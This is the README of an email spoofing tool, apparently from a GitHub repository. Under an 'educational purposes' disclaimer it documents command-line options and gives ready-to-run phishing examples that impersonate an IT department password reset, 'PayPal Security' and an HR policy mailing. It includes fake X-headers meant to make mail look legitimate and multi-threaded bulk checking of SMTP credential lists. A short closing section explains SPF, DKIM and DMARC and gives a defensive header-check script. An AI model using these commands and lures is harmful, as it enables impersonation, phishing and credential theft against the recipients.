This repository contains Python scripts that demonstrate how email spoofing works for educational purposes only. Email spoofing is a technique used to forge email headers so that messages appear to originate from someone other than the actual sender.
This tool is meant for educational purposes only. Using it to send deceptive emails without consent:
- Is illegal in most jurisdictions
- Is unethical
- May violate email providers' terms of service
- Could result in your IP address or account being blacklisted
The author assumes no responsibility for any misuse of this information or script.
- Basic email spoofing with custom From header
- Advanced header manipulation
- Custom X-header generation
- Support for multiple recipients (To, CC, BCC)
- File attachments
- Reply-To address customization
- HTML email templates
- Debug mode for troubleshooting
- Bulk testing of SMTP servers from a file
- Multi-threaded SMTP server testing
- Colorized console output
- Python 3.6 or later
- Required Python packages:
  - colorama
- Access to an SMTP server (most email providers will require authentication)
- SMTP server that allows header manipulation (many public email services now block this)
```bash
git clone https://github.com/Triotion/email-spoofing.git
cd email-spoofing
pip install colorama
```

```bash
python email_spoofer.py --server smtp.example.com --port 587 --user [email protected] --password your_password --from-name "Spoofed Name" --from-email [email protected] --to [email protected] --subject "Test Subject" --message "<h1>This is a test</h1><p>This email demonstrates spoofing.</p>"
```
You can provide multiple SMTP servers in a file and the script will test them all to find working ones:
```bash
python advanced_email_spoofer.py --smtp-file smtp_servers.txt --from-name "Spoofed Name" --from-email [email protected] --to [email protected] --subject "Test Subject" --message "This is a test message"
```
The SMTP server file format is simple:
```
host|port|username|password
```
For example:
```
smtp.example.com|587|[email protected]|password123
smtp.another.com|465|[email protected]|securepass
```
You can test which SMTP servers are working without sending emails:
```bash
python advanced_email_spoofer.py --smtp-file smtp_servers.txt --test-only --threads 10
```
This will:
- Test all SMTP servers in the file
- Use 10 threads to speed up the testing process
- Show which servers are working
- Exit without sending any emails
- `--server`: SMTP server address
- `--port`: SMTP server port (default: 587)
- `--user`: SMTP username (typically your real email)
- `--password`: SMTP password
- `--smtp-file`: File containing SMTP credentials in format "host|port|username|password"
- `--test-only`: Only test SMTP servers, don't send emails
- `--threads`: Number of threads for testing SMTP servers (default: 5)
- `--debug`: SMTP debug level (0-2)

- `--from-name`: Display name you want to show as the sender
- `--from-email`: Email address you want to show as the sender
- `--reply-to`: Reply-to email address
- `--to`: Recipient email(s), comma separated
- `--cc`: CC recipient(s), comma separated
- `--bcc`: BCC recipient(s), comma separated
- `--subject`: Email subject
- `--message`: Email body content (HTML supported)
- `--plain-text`: Send as plain text instead of HTML
- `--attach`: File(s) to attach (can be used multiple times)
- `--add-xheaders`: Add fake X-headers to make email look more legitimate
- `--custom-header`: Add custom header in format "Header:Value" (can be used multiple times)
```bash
python email_spoofer.py \
  --server smtp.example.com \
  --port 587 \
  --user [email protected] \
  --password your_password \
  --from-name "John Smith" \
  --from-email [email protected] \
  --to [email protected] \
  --subject "Urgent: Action Required" \
  --message "Please review the attached document and respond ASAP."
```

```bash
python email_spoofer.py \
  --server smtp.example.com \
  --port 587 \
  --user [email protected] \
  --password your_password \
  --from-name "IT Department" \
  --from-email [email protected] \
  --to [email protected] \
  --subject "Password Reset Required" \
  --message "<h2>Security Alert</h2><p>Your password needs to be reset. <a href='https://example.com'>Click here</a> to reset.</p>"
```

```bash
# First, read the HTML template
TEMPLATE=$(cat email_template.html)
# Then use it in the command
python advanced_email_spoofer.py \
  --server smtp.example.com \
  --port 587 \
  --user [email protected] \
  --password your_password \
  --from-name "Security Team" \
  --from-email [email protected] \
  --reply-to [email protected] \
  --to [email protected] \
  --subject "Security Alert: Verify Your Account" \
  --message "$TEMPLATE"
```

```bash
python advanced_email_spoofer.py \
  --server smtp.example.com \
  --port 587 \
  --user [email protected] \
  --password your_password \
  --from-name "PayPal Security" \
  --from-email [email protected] \
  --to [email protected] \
  --subject "Your account has been limited" \
  --message "<p>Dear customer,</p><p>Your PayPal account has been temporarily limited. Please <a href='https://example.com'>verify your information</a> to restore access.</p>" \
  --add-xheaders \
  --custom-header "List-Unsubscribe: <mailto:[email protected]>" \
  --custom-header "Precedence: bulk"
```

```bash
python advanced_email_spoofer.py \
  --smtp-file smtp_servers.txt \
  --from-name "HR Department" \
  --from-email [email protected] \
  --to "[email protected],[email protected]" \
  --cc "[email protected]" \
  --subject "Updated Company Policy" \
  --message "<p>Please find attached the updated company policy document.</p><p>All employees must read and acknowledge by Friday.</p>" \
  --attach policy_document.pdf
```

```bash
python advanced_email_spoofer.py \
  --smtp-file smtp_servers.txt \
  --test-only \
  --threads 10
```
Modern email systems have multiple protections against spoofing:
- SPF (Sender Policy Framework): Validates if the sending server is authorized to send emails for the domain
- DKIM (DomainKeys Identified Mail): Cryptographically verifies email authenticity
- DMARC (Domain-based Message Authentication, Reporting & Conformance): Policy framework that uses SPF and DKIM results
These protections mean that while you can change the "From" header, receiving mail servers can detect that the email wasn't actually sent from the claimed domain, often marking such emails as spam or rejecting them entirely.
To protect yourself from email spoofing:
- Check email headers for discrepancies
- Be suspicious of unexpected emails, especially those requesting sensitive information
- Enable SPF, DKIM, and DMARC for your own domains
- Use email providers that implement strong anti-spoofing measures
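
The header check in the first item can be automated on the receiving side. The following is an added example, not code from this repository: it uses Python's standard `email` module to flag a From domain that disagrees with Return-Path or Reply-To, and any SPF, DKIM or DMARC verdict other than `pass` in Authentication-Results. The sample message, its addresses, the `mx.example.net` server name and the function names are constructed for illustration.

```python
from email import message_from_string
from email.utils import parseaddr
import re

# Constructed sample: the visible From claims one domain while the envelope
# sender (Return-Path) and Reply-To point somewhere else.
SAMPLE = """\
Return-Path: <relay-user@mailer.example.org>
Authentication-Results: mx.example.net;
 spf=pass smtp.mailfrom=mailer.example.org;
 dkim=none;
 dmarc=fail header.from=corp.example.com
From: "IT Department" <helpdesk@corp.example.com>
Reply-To: support@lookalike.example.org
To: user@example.net
Subject: Test Subject

body
"""

def domain_of(value):
    """Return the lower-cased domain of an address header value, or ''."""
    addr = parseaddr(value or "")[1]
    return addr.rpartition("@")[2].lower() if "@" in addr else ""

def spoofing_indicators(raw):
    """Return a list of header discrepancies that deserve a closer look."""
    msg = message_from_string(raw)
    findings = []
    from_dom = domain_of(msg["From"])
    # Strict comparison: any differing domain is reported for triage.
    for header in ("Return-Path", "Reply-To"):
        dom = domain_of(msg[header])
        if dom and dom != from_dom:
            findings.append(f"{header} domain {dom} != From domain {from_dom}")
    # Authentication-Results (RFC 8601) records the receiver's verdicts.
    results = " ".join(msg.get_all("Authentication-Results") or [])
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", results)
        verdict = m.group(1).lower() if m else "missing"
        if verdict != "pass":
            findings.append(f"{mech}={verdict}")
    return findings

if __name__ == "__main__":
    for finding in spoofing_indicators(SAMPLE):
        print(finding)
```

Authentication-Results is only meaningful when it was added by your own receiving server; headers of the same name that arrived with the message can be forged. The exact-domain comparison is deliberately strict, so senders that use a bounce subdomain or a third-party mailer will also be flagged for review.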
Legitimate reasons to understand email spoofing include:
- Security research and education
- Penetration testing (with proper authorization)
- Testing your own email security systems
- Most modern email services will detect spoofed emails and mark them as spam or reject them entirely.
- To see the email headers that were actually received, ask the recipient to view the full headers of the email.
- For testing, it's recommended to send to email accounts you control.
- Some email providers (like Gmail) may rewrite your From header to include your actual authenticated email, such as:

  ```
  From: "John Smith via [email protected]" <[email protected]>
  ```
Created by @Triotion - Telegram
This project is licensed under the MIT License - see the LICENSE file for details.